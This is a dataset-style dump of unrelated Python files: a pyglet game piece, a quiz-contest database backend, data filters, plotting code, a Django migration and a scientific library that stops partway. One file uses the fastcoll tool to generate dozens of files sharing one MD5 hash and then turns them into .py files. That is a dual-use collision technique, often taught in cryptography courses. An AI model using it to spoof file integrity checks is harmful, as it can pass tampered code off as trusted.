text stringlengths 38 1.54M |
|---|
# coding=utf-8
import pyglet
import BasePiece
class Piece(BasePiece.BasePiece):
    """A selectable, movable board piece rendered with pyglet.

    Drawing/colour helpers (PreparePiece, ShowPiece, ChangeColor) come from
    BasePiece.BasePiece.
    """

    def __init__(self, name, x, y):
        self.__name = name
        self.current_position = [x, y]
        self.__target_position = []
        self.isKilled = False
        self.__position_history = []
        self.PreparePiece(name)
        self.__selected = False

    def Kill(self):
        # Not implemented yet.
        pass

    def Killed(self):
        self.isKilled = True

    def Select(self, window):
        """Toggle selection state and redraw with the toggled colour."""
        self.__selected = not self.__selected
        self.ChangeColor()
        self.ShowPiece()

    def Move(self, x, y, window):
        """Move the piece to (x, y) if it is currently selected."""
        window.clear()
        if self.__selected:
            self.__target_position = [x, y]
            self.current_position = self.__target_position
            # BUG FIX: the original assigned `self.target_position`, creating a
            # new public attribute and leaving the name-mangled
            # `__target_position` stale; clear the private attribute instead.
            self.__target_position = []
            self.PreparePiece(self.__name)
            self.ShowPiece()
            self.__selected = False
if __name__ == "__main__":
    window = pyglet.window.Window()
    p = Piece(u"象", 100, 100)

    # BUG FIX: pyglet's no-argument decorator form is `@window.event`;
    # calling `@window.event()` with no arguments raises TypeError.
    @window.event
    def on_mouse_press(x, y, button, modifiers):
        # 12-pixel square hit box centred on the piece.
        px, py = p.current_position
        if px - 12 <= x < px + 12 and py - 12 <= y < py + 12:
            p.Select(window)
            window.clear()
        else:
            p.Move(x, y, window)

    @window.event
    def on_draw():
        window.clear()
        p.ShowPiece()

    pyglet.app.run()
import requests as req
import json

# Ask a locally running chromedriver (port 9515) to open a new WebDriver
# session via the raw JSON wire protocol.
url = 'http://localhost:9515/session'
data = json.dumps({
    "desiredCapabilities": {
        "caps": {
            "nativeEvents": "false",
            "browserName": "chrome",
            "version": "",
            "platform": "ANY"
        }
    }
})
r = req.post(url, data)
# Session teardown / inspection helpers kept for manual experimentation:
# req.delete('http://localhost:9515/session/1edf41f715a2dbccf6ea7216bfa13998')
# print(r.json())


class ApiBase:
    pass
# 讀取檔案,把內容存成清單
def read_file(filename):
    """Read *filename* and return its lines (trailing newlines kept) as a list."""
    with open(filename, 'r') as fh:
        return [line for line in fh]
def word_count_filter(data, amount):
    """Print how many comments in *data* are shorter than *amount* characters.

    Also returns the filtered list (backward compatible: the original
    returned None, which no caller can have depended on for a value).
    """
    new = [d for d in data if len(d) < amount]
    print(f'一共有{len(new)}筆留言長度小於{amount}')
    return new
def key_word_filter(data, keyword):
    """Print how many comments in *data* mention *keyword*; return them too."""
    new = [d for d in data if keyword in d]
    print(f'一共有{len(new)}筆留言提到{keyword}')
    return new
def word_count(filename):
    """Build a word-frequency table from *filename*, then run an interactive
    lookup loop; entering 'q' quits."""
    counts = {}
    for line in read_file(filename):
        for token in line.split():
            counts[token] = counts.get(token, 0) + 1
    while True:
        query = input('請輸入你要查詢的字: ')
        if query == 'q':
            break
        if query in counts:
            print(query, '出現的次數為', counts[query])
        else:
            print('這個字不在字典裡')
|
import pymysql
import aws_credentials as rds
import string
import random
import datetime
def id_generator(size, chars=string.ascii_uppercase + string.digits):
    """Return a random identifier of *size* characters drawn from *chars*."""
    return ''.join(random.choices(chars, k=size))
def ticket_generator(size, chars=string.ascii_letters + string.digits):
    """Return a random ticket string of *size* characters from *chars*.

    SECURITY FIX: tickets gate paid contest entry (see get_ticket), so they
    must be unguessable; use the OS CSPRNG instead of the seedable module
    PRNG. Output format and interface are unchanged.
    """
    rng = random.SystemRandom()
    return ''.join(rng.choice(chars) for _ in range(size))
def signup(email, password):
    """Insert a new UserMaster row; the display name is the email local part.

    NOTE(review): `password` is stored directly in PasswordHash — confirm it
    is hashed by the caller.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        UserID = id_generator(64)
        with conn.cursor() as cur:
            sql = "insert into UserMaster (UserId, Name, EmailAddress, PasswordHash) value (%s,%s,%s,%s)"
            name = email.split("@")[0]
            cur.execute(sql, (UserID, name, email, password))
            conn.commit()
    except Exception as e:
        print("error in sign up for email", email, "error: ", e)
    finally:
        conn.close()  # fix: the original leaked the connection
def login(email, password):
    """Check credentials; return a user-info dict or {'correct': "wrong"}.

    NOTE(review): plain-text comparison against PasswordHash — confirm the
    caller hashes first. The 'WalletBallance' key typo is kept for callers.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select UserId, Name, PasswordHash, WalletBalance, CreateDate from UserMaster where EmailAddress=%s"
            cur.execute(sql, (email,))
            data = cur.fetchall()
            # Fix: an unknown email used to raise IndexError (swallowed by the
            # except below); handle the empty result explicitly.
            if not data or password != data[0][2]:
                return {'correct': "wrong"}
            return {'correct': "correct", "UserID": data[0][0], "Name": data[0][1],
                    "WalletBallance": data[0][3], "CreatedDate": data[0][4]}
    except Exception as e:
        print("error in loging-in for email", email, "error: ", str(e))
        return {'correct': "wrong"}
    finally:
        conn.close()  # fix: the original leaked the connection
def UserExist(email):
    """Return 1 if a UserMaster row exists for *email*, else 0 (0 on error too)."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select exists(select * from UserMaster where EmailAddress=%s)"
            cur.execute(sql, (email,))
            exist = cur.fetchall()
            return exist[0][0]
    except Exception as e:
        print("error in UserExist API for email", email, "error: ", str(e))
        return 0
    finally:
        conn.close()  # fix: the original leaked the connection
def change_password(email, password):
    """Update PasswordHash for *email*; returns 0 on error, None on success."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "update UserMaster set PasswordHash = %s where EmailAddress=%s"
            cur.execute(sql, (password, email))
            conn.commit()
    except Exception as e:
        print("error in change_password API for email", email, "error: ", str(e))
        return 0
    finally:
        conn.close()  # fix: the original leaked the connection
def contestList():
    """Return all ContestMaster rows whose CompletionDate is in the future,
    or None on error."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select * from ContestMaster where date(CompletionDate) > date(now());"
            cur.execute(sql)
            return cur.fetchall()
    except Exception as e:
        print("error in Listing Contest error: ", str(e))
        return
    finally:
        conn.close()  # fix: the original leaked the connection
def get_contest_details(contestID):
    """Return ContestAwardDetails rows for *contestID* ordered by StartRank,
    or "error" on failure."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select * from ContestAwardDetails where ContestID = %s order by StartRank ASC;"
            cur.execute(sql, (contestID,))
            return cur.fetchall()
    except Exception as e:
        print("error in getting Contest data, error: ", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def get_contest_pay(contestID):
    """Return the TicketPrice rows for *contestID*, or "error" on failure."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select TicketPrice from ContestMaster where ContestID = %s"
            cur.execute(sql, (contestID,))
            return cur.fetchall()
    except Exception as e:
        print("error in getting contest entry fees, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def get_Current_Wallet_Balance(userid):
    """Return WalletBalance rows for *userid*, or "error" on failure.

    NOTE(review): an identical function is redefined later in this module and
    shadows this one at import time — consolidate to a single definition.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select WalletBalance from UserMaster where UserID = %s"
            cur.execute(sql, (userid,))
            return cur.fetchall()
    except Exception as e:
        print("error in getting Wallet Balance, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def isspotsLeft(contestID):
    """Return True if the contest still has open spots, False if full,
    "error" on failure."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select SpotsLeft from ContestMaster where contestID = %s"
            cur.execute(sql, (contestID,))
            data = cur.fetchone()
            return data[0] > 0
    except Exception as e:
        print("error in checking Spots lefts, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def get_ticket(contestID, UserID):
    """Issue a participation ticket for *UserID* in *contestID*.

    Returns the new ticket id, "Money_limit" if the wallet cannot cover the
    ticket price, or "error" on failure.

    NOTE(review): the balance check and the insert are not atomic, and the
    wallet is never debited here — confirm debiting happens elsewhere.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select WalletBalance from UserMaster where UserID = %s"
            cur.execute(sql, (UserID,))
            walletBallance = cur.fetchall()[0][0]
            sql = "select TicketPrice from ContestMaster where ContestID = %s"
            cur.execute(sql, (contestID,))
            TicketPrice = cur.fetchall()[0][0]
            if walletBallance < TicketPrice:
                return "Money_limit"
            ticketid = ticket_generator(64)
            # TicketState: 0 = unused, 1 = used, 2 = expired unused,
            # 3 = expired and used.
            TicketState = 0
            sql = "insert into UserContestParticipationDetails (TicketID, UserID, ContestID, TicketState) value (%s,%s,%s,%s)"
            cur.execute(sql, (ticketid, UserID, contestID, TicketState))
            conn.commit()
            return ticketid
    except Exception as e:
        print("error in getting ticket, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def get_Current_Wallet_Balance(userid):
    """Return WalletBalance rows for *userid*, or "error" on failure.

    NOTE(review): duplicate of the earlier identically-named function; this
    redefinition shadows it. Kept for file layout; delete one copy.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select WalletBalance from UserMaster where UserID = %s"
            cur.execute(sql, (userid,))
            return cur.fetchall()
    except Exception as e:
        print("error in getting Wallet Balance, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def ticket_history(UserID, contestID):
    """Return the user's participation rows, newest first.

    contestID == "all" returns every contest; otherwise only that contest.
    Returns "error" on failure.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            if contestID == "all":
                sql = "select * from UserContestParticipationDetails where UserID = %s order by CreatedDate desc"
                cur.execute(sql, (UserID,))
            else:
                sql = "select * from UserContestParticipationDetails where UserID = %s and ContestID = %s order by CreatedDate desc"
                cur.execute(sql, (UserID, contestID))
            return cur.fetchall()
    except Exception as e:
        print("error in getting ticket history, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def ticket_state(ticketID):
    """Return the TicketState for *ticketID* (see get_ticket for the state
    encoding), or "error" on failure."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select TicketState from UserContestParticipationDetails where TicketID = %s"
            cur.execute(sql, (ticketID,))
            data = cur.fetchone()
            return data[0]
    except Exception as e:
        print("error in getting ticket State, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def ticket_start_time(ticketID):
    """Return the TestStartDate for *ticketID*, or "error" on failure."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select TestStartDate from UserContestParticipationDetails where TicketID = %s"
            cur.execute(sql, (ticketID,))
            data = cur.fetchone()
            return data[0]
    except Exception as e:
        print("error in getting ticket Start date, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def ticket_info(ticketID):
    """Return the full participation row for *ticketID*, or "error" on failure."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select * from UserContestParticipationDetails where TicketID = %s"
            cur.execute(sql, (ticketID,))
            return cur.fetchone()
    except Exception as e:
        print("error in getting ticket info, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
# Per-ticket cache so repeated calls for a ticket return the same 10 questions.
# NOTE(review): grows without bound — entries are never evicted.
question_map = {}


def get_random_questions(ticketid):
    """Return (and cache) 10 random QuestionBank rows for *ticketid*,
    or "error" on failure."""
    if ticketid in question_map:
        return question_map[ticketid]
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select QuestionID, QuestionDescription, Option1, Option2, Option3, Option4 from QuestionBank order by rand() limit 10;"
            cur.execute(sql)
            data = cur.fetchall()
            question_map[ticketid] = data
            return data
    except Exception as e:
        print("error in getting questions, error:", e)
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def use_ticket(startdate, ticketid):
    """Stamp TestStartDate on the ticket; returns "done" or "error"."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "update UserContestParticipationDetails set TestStartDate = %s where TicketID=%s"
            cur.execute(sql, (startdate, ticketid))
            conn.commit()
            return "done"
    except Exception as e:
        print("error in useing ticket, error: ", str(e))
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def finish_ticket(starttime, ticketid, q_response_dic):
    """Grade *q_response_dic* ({questionID: chosen option}) and close the ticket.

    Returns "done" on success, "error" otherwise.
    NOTE(review): *starttime* is written to TestSubmitDate — confirm callers
    pass the submission time here.
    """
    total = len(q_response_dic)
    marks_obtain = 0
    for qid, answer in q_response_dic.items():
        check = iscorrect(qid, answer)
        if check == "error":
            return "error"
        elif check == 1:
            marks_obtain += 1
    state = ticket_state(ticketid)
    if state == "error":
        return "error"
    elif state == 0:
        state = 1  # 0 = unused -> 1 = used; other states pass through unchanged
    # Fix: the original opened the connection before grading and leaked it on
    # every early return; connect only once grading has succeeded.
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "update UserContestParticipationDetails set ObtainedScore = %s, MaximumScore =%s, TestSubmitDate = %s,TicketState = %s where TicketID=%s"
            cur.execute(sql, (marks_obtain, total, starttime, state, ticketid))
            conn.commit()
            return "done"
    except Exception as e:
        print("error in finish ticket, error: ", str(e))
        return "error"
    finally:
        conn.close()
def iscorrect(questionID, response):
    """Return 1 if *response* is the stored CorrectOption for *questionID*,
    0 if not, "error" on failure."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            sql = "select CorrectOption from QuestionBank where QuestionID=%s"
            cur.execute(sql, (questionID,))
            correct_option = cur.fetchone()
            return 1 if correct_option[0] == response else 0
    except Exception as e:
        print("error in checking question correctness, error: ", str(e))
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def CreateContest(ContestID, CompletionDate, TicketPrice, TotalSpots):
    """Insert a ContestMaster row (SpotsLeft starts equal to TotalSpots).

    Returns "error" on failure, None on success.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            # SECURITY FIX: the original built this statement by string
            # concatenation (SQL injection); use bound parameters instead.
            sql = ("insert into ContestMaster "
                   "(ContestID, CompletionDate, TicketPrice, TotalSpots, SpotsLeft) "
                   "values (%s,%s,%s,%s,%s)")
            cur.execute(sql, (ContestID, CompletionDate, TicketPrice, TotalSpots, TotalSpots))
            conn.commit()
    except Exception as e:
        print("error in Creating Contest, error: ", str(e))
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def create_event(ContestID, CompletionDate):
    """Create a MySQL scheduled event that expires the contest's tickets
    (TicketState += 2) at *CompletionDate*.

    Returns "error" on failure, None on success.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            event_name = "event_" + str(ContestID)
            # SECURITY FIX: identifiers and the AT clause cannot be bound as
            # parameters, so validate the event name and let the driver quote
            # the schedule timestamp instead of splicing it in raw.
            if not event_name.replace("_", "").isalnum():
                raise ValueError("unsafe ContestID for event name")
            sql = ("create event " + event_name + " ON SCHEDULE AT " + conn.escape(str(CompletionDate)) +
                   " DO update UserContestParticipationDetails set TicketState = TicketState + 2 where ContestID = %s")
            cur.execute(sql, (ContestID,))
            conn.commit()
    except Exception as e:
        print("error in Creating Contest end event, error: ", str(e))
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def get_all_contest():
    """Return every ContestMaster row, or "error" on failure."""
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            cur.execute("select * from ContestMaster")
            return cur.fetchall()
    except Exception as e:
        print("error in getting all Contest, error: ", str(e))
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def add_contest_details(StartRank, EndRank, Prize, contestid):
    """Insert one prize bracket row into ContestAwardDetails.

    Returns "error" on failure, None on success.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            # SECURITY FIX: parameterized instead of string concatenation.
            sql = ("insert into ContestAwardDetails (ContestID, StartRank, EndRank, AwardAmount) "
                   "values (%s,%s,%s,%s)")
            cur.execute(sql, (contestid, StartRank, EndRank, Prize))
            conn.commit()
    except Exception as e:
        print("error in adding Contest details, error: ", str(e))
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
def delete_contest_details(StartRank, EndRank, contestid):
    """Delete the matching prize bracket row from ContestAwardDetails.

    Returns "error" on failure, None on success.
    """
    conn = pymysql.connect(
        host=rds.host, port=rds.port, user=rds.user,
        password=rds.password, db=rds.databasename,
    )
    try:
        with conn.cursor() as cur:
            # SECURITY FIX: parameterized instead of string concatenation.
            sql = ("delete from ContestAwardDetails "
                   "where StartRank = %s and EndRank = %s and ContestID = %s")
            cur.execute(sql, (StartRank, EndRank, contestid))
            conn.commit()
    except Exception as e:
        print("error in deleting Contest details, error: ", str(e))
        return "error"
    finally:
        conn.close()  # fix: the original leaked the connection
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Time : 2018/10/17
@Author : AnNing
"""
import datetime
from dateutil.relativedelta import relativedelta
import numpy as np
def is_day_timestamp_and_lon(timestamp, lon):
    """Return True when the crude local solar time for (*timestamp*, *lon*)
    falls in 06:00-18:00.

    :param timestamp: seconds since 1970-01-01 (UTC)
    :param lon: longitude in degrees; the zone offset is int(lon / 15)
    :return: bool
    """
    zone = int(lon / 15.)  # whole-hour offset, truncated toward zero
    # BUG FIX: `datetime` here is the module, so the original call
    # `datetime.utcfromtimestamp(...)` raised AttributeError; also use the
    # stdlib timedelta (identical to relativedelta for integer hours).
    stime = datetime.datetime.utcfromtimestamp(timestamp)
    hh = (stime + datetime.timedelta(hours=zone)).strftime('%H')
    if 6 <= int(hh) <= 18:
        return True
    else:
        return False
def filter_data_by_delta_sigma(x, y, w=None, n=8):
    """Flag points lying within mean(|residual|) + n*std(|residual|) of a
    weighted degree-1 fit of y on x.

    :param x: abscissa array
    :param y: ordinate array
    :param w: optional fit weights (passed to np.polyfit)
    :param n: band width in units of the residual std
    :return: boolean index array (True = keep)
    """
    slope, intercept = np.polyfit(x, y, 1, w=w)
    fit = x * slope + intercept
    resid = np.abs(y - fit)
    band = np.nanmean(resid) + np.nanstd(resid) * n
    return np.logical_and(y < fit + band, y > fit - band)
def filter_data_by_time(data, timestamp, longitude, time):
    """Keep only the samples matching *time* ('day'/'night'/'all').

    Dict inputs are filtered value-by-value in place (and returned);
    array inputs are returned as a filtered copy.
    """
    index = get_time_index_by_timestamp_longitude(timestamp, longitude, time)
    if isinstance(data, dict):
        for key in data:
            data[key] = data[key][index]
        return data
    return data[index]
def get_time_index_by_sun_zenith(zenith, time):
    """Index of day / night / all samples by solar zenith angle.

    zenith >= 90 is night, zenith < 90 is day.
    :param zenith: zenith-angle array
    :param time: 'day', 'night' or 'all' (case-insensitive)
    :raises KeyError: for any other *time* value
    """
    selector = {
        'all': lambda z: np.where(z),
        'day': lambda z: np.where(z < 90),
        'night': lambda z: np.where(z >= 90),
    }
    key = time.lower()
    if key not in selector:
        raise KeyError('{} can not be handled.'.format(key))
    return selector[key](zenith)
def get_time_index_by_timestamp_longitude(timestamp, longitude, time):
    """
    Get the index of day / night / all samples from timestamps and longitudes.
    :param timestamp: seconds since 1970-01-01 (per is_day_timestamp_and_lon)
    :param longitude: longitude array
    :param time: 'day', 'night' or 'all' (case-insensitive)
    :return: index usable for fancy indexing

    NOTE(review): 'all' returns an np.where tuple while 'day'/'night' return
    boolean arrays — both index correctly but the types differ; confirm callers
    do not rely on one specific form. Also depends on is_day_timestamp_and_lon,
    which is broken in the original module (datetime module misuse).
    """
    time = time.lower()
    # Vectorize the scalar day/night predicate over the input arrays.
    vectorize_is_day = np.vectorize(is_day_timestamp_and_lon)
    if time == 'all':
        index = np.where(timestamp)
    elif time == 'day':
        index = vectorize_is_day(timestamp, longitude)
    elif time == 'night':
        index = np.logical_not(vectorize_is_day(timestamp, longitude))
    else:
        raise KeyError('{} can not be handled.'.format(time))
    return index
def has_empty_data_or_not_equal_length(datas):
    """Return True when any element of *datas* is empty/falsy or when the
    elements do not all share the same length."""
    seen_lengths = set()
    for item in datas:
        # NOTE: truthiness test — intended for list-like elements (ambiguous
        # for multi-element numpy arrays).
        if not item:
            return True
        seen_lengths.add(len(item))
    return len(seen_lengths) > 1
|
import sys
import time
import threading
from itertools import count
import random
import numpy as np
import datetime as dt
import matplotlib.pyplot as plt
import matplotlib.animation as animation

plt.style.use('dark_background')

# length of the rolling window shown on screen
n = 50

# Figure and axes reused by every animate() call.
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
xs = list(range(n))
ys = [0] * n


# This function is called periodically from FuncAnimation
def animate(i, xs, ys):
    """Append a new random sample and redraw the last *n* points."""
    ys.append(random.randint(0, 100))
    # BUG FIX: `ys = ys[-n:]` only rebound a local name, so the shared list
    # grew without bound; trim it in place instead (plot output unchanged).
    del ys[:-n]
    # Draw x and y lists
    ax.clear()
    ax.plot(xs, ys)
    # Format plot
    plt.xticks(rotation=45, ha='right')
    plt.subplots_adjust(bottom=0.30)
    plt.title('Fancy title')
    plt.ylabel('Sun sensor (%)')
    plt.axis([0, n + 4, 0, 100])
    plt.xticks([])


# Set up plot to call animate() function periodically
ani = animation.FuncAnimation(fig, animate, fargs=(xs, ys), interval=500)
plt.show()
# --------------------------------
#
# # plotting
# plt.style.use('dark_background')
#
# plt.axis([0, 50, 0, 100])
#
# x_values = []
# y_values = []
#
# for i in range(50):
# x_values.append(i)
# y_values.append(random.randint(0, 100))
# plt.plot(x_values, y_values,'r')
# plt.pause(0.05)
#
# # for future
# timeAx = dt.datetime.now().strftime('%H:%M:%S.%f')
#
# plt.show()
# ----------------------------------------------
#
# plt.style.use('fivethirtyeight')
#
# x_values = []
# y_values = []
#
# index = count()
#
# # plotting
# def animate(i):
# x_values.append(next(index))
# # y_values.append(tlm('ESAT12_WIFI ADCS_PACKET ADCS_SOLAR_SENSOR_X_PLUS'))
# y_values.append(random.randint(0,100))
# plt.cla()
# plt.plot(x_values,y_values)
# # print(tlm('ESAT12_WIFI ADCS_PACKET ADCS_SOLAR_SENSOR_X_PLUS'))
# # print(get_tlm_buffer('ESAT12_WIFI', 'ADCS_PACKET'))
#
# ani = FuncAnimation(plt.gcf(),animate, 150)
#
# plt.tight_layout()
# plt.show() |
# Generated by Django 2.2.12 on 2020-09-03 19:52
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the homepage `current_session` table: an auto id plus a single
    integer `session` column (default 0)."""

    dependencies = [
        ('homepage', '0011_session_table'),
    ]

    operations = [
        migrations.CreateModel(
            name='current_session',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('session', models.IntegerField(default=0)),
            ],
        ),
    ]
|
import hashlib
import shlex
import subprocess
from os import system
def Mash(input):
    """Print and return the hex MD5 digest of *input* (bytes).

    Returning the digest (the original returned None) lets callers use the
    value programmatically; the printed output is unchanged.
    """
    m = hashlib.md5()
    m.update(input)
    digest = m.hexdigest()
    print(digest)
    return digest
def main():
    """Grow a family of 2..64 MD5-colliding files with fastcoll, then print
    each file's digest for verification.

    Assumes ./fastcoll, `prefix` and `suffix1` exist in the working directory.
    NOTE(review): indentation was lost in the source dump; the nesting below
    is reconstructed from the algorithm's logic — confirm against the
    original file.
    """
    curFiles = 2
    # Seed collision: col0/col1 share an MD5 built from `prefix`.
    subprocess.run(["./fastcoll", "-p", "prefix", "-o", "col0", "col1"])
    while (curFiles <= 32):
        # Next colliding block pair, generated from col0's current content.
        subprocess.run(["./fastcoll", "-p", "col0", "-o", "colx", "coly"])
        with open("colx", "rb") as f:
            byte1 = f.read()
        with open("coly", "rb") as f:
            byte2 = f.read()
        newHash1 = []
        newHash2 = []
        L1 = len(byte1)
        L2 = len(byte2)
        # Copy the last 128 bytes (the colliding tail) of each output.
        id = 1
        while (id != 129):
            newHash1.append(byte1[L1 - id])
            id = id + 1
        newHash1.reverse()
        id = 1
        while (id != 129):
            newHash2.append(byte2[L2 - id])
            id = id + 1
        newHash2.reverse()
        newHash1 = bytes(newHash1)
        newHash2 = bytes(newHash2)
        hashList = {}
        # Append tail 1 to every existing file -> even-numbered outputs,
        # tail 2 -> odd-numbered outputs; the family size doubles.
        for i in range(0, curFiles):
            filename = "col" + str(i)
            with open(filename, "rb") as f:
                prev = f.read()
            newHash1 = bytes(newHash1)
            prev = prev + newHash1
            hashList["col" + str(i * 2)] = prev
            filename = "col" + str(i)
            with open(filename, "rb") as f:
                prev = f.read()
            newHash2 = bytes(newHash2)
            prev = prev + newHash2
            hashList["col" + str(i * 2 + 1)] = prev
        for i in range(0, curFiles):
            filename = "col" + str(i * 2)
            # NOTE(review): these handles are never closed — leak.
            f = open(filename, "wb")
            f.write(hashList[filename])
            filename = "col" + str(i * 2 + 1)
            f = open(filename, "wb")
            f.write(hashList[filename])
        curFiles = curFiles * 2
    #
    curFiles = int(curFiles / 2)
    print("verification")
    for i in range(0, curFiles):
        filename = "col" + str(i * 2)
        print(filename + ":")
        f = open(filename, "rb")
        newFilename = "file" + str(i * 2) + ".py"
        # NOTE(review): fx is opened but never written to or closed; the file
        # content actually comes from the shell `cat` below.
        fx = open(newFilename, "wb")
        system("cat " + filename + " suffix1 > " + newFilename)
        inp = f.read()
        Mash(inp)
        filename = "col" + str(i * 2 + 1)
        print(filename + ":")
        f = open(filename, "rb")
        newFilename = "file" + str(i * 2 + 1) + ".py"
        fx = open(newFilename, "wb")
        system("cat " + filename + " suffix1 > " + newFilename)
        inp = f.read()
        Mash(inp)
if __name__ == '__main__':
main()
# now run the he 00HelpingFunction function |
import numpy as np
import time
import scipy.spatial as sp
import scipy
import matplotlib.path as mpltpath
import matplotlib.pyplot as plt
from scipy import interpolate
# Wall-clock timings accumulated by VCells.gen_wprMFs / gen_pMF below.
rtimewprMFs = []
rtimesum = []
print("lsspy.optMF3D: This optimized library computes the 3-D Minkowski Functional based on a Voronoi Tessellation.\n")
C_chi = (4./3)*np.pi  # 4*pi/3 prefactor used for full-ball Minkowski functionals
def Voronoi(points):
    """Thin wrapper: the scipy Voronoi tessellation of *points*."""
    return sp.Voronoi(points)
def dist(x1, x2):
    """Euclidean distance between points *x1* and *x2* (1-D arrays)."""
    d = x1 - x2
    return np.sqrt(d.dot(d))
def zfastsolang(dtp, rop, one, nprop, npone, sin, cos):
    """Solid-angle contribution of one wall edge via an arctan formula.

    Parameter meanings reconstructed from the call sites in gen_wall_params —
    TODO confirm: dtp = seed-to-plane distance, rop/one = in-plane norms of
    the two edge endpoints, nprop/npone = 3-D endpoint distances to the seed,
    sin/cos = sine/cosine of the subtended angle.
    """
    dtpsq = dtp**2
    return 2*np.arctan((rop*one*sin)/(nprop*npone+dtp*(nprop+npone)+rop*one*cos+dtpsq))
def get_G_ijk(r, h, d12, d23, d31):
    """Angle subtended on a sphere of radius *r* by a triangle with side
    lengths d12, d23, d31 and height parameter *h*, wrapped into [0, 2*pi).

    Uses Heron's formula for the planar triangle area inside the arctan —
    presumably a spherical-triangle solid angle; TODO confirm the derivation.
    """
    s = (d12+d23+d31)/2  # semi-perimeter for Heron's formula
    a = 2*np.arctan((2*h*np.sqrt(s*(s-d12)*(s-d23)*(s-d31))/(4*r**2-(d12**2+d23**2+d31**2)/2))/r)
    if a < 0:
        return 2*np.pi+a  # wrap negative branch of arctan into [0, 2*pi)
    return a
def get_G_ijko(r, d12, d23, d31):
    """Solid angle of the spherical triangle cut on a sphere of radius *r* by
    three chords of lengths d12, d23, d31 (l'Huilier's theorem)."""
    r2 = 2*r
    # Convert each chord length to its central arc angle: a = 2*asin(d / 2r).
    a3 = 2*np.arcsin(d12/r2)
    a1 = 2*np.arcsin(d23/r2)
    a2 = 2*np.arcsin(d31/r2)
    return 4*np.arctan(np.sqrt(np.tan((a1+a2+a3)/4)*np.tan((a1+a2-a3)/4)*np.tan((a1-a2+a3)/4)*np.tan((-a1+a2+a3)/4)))
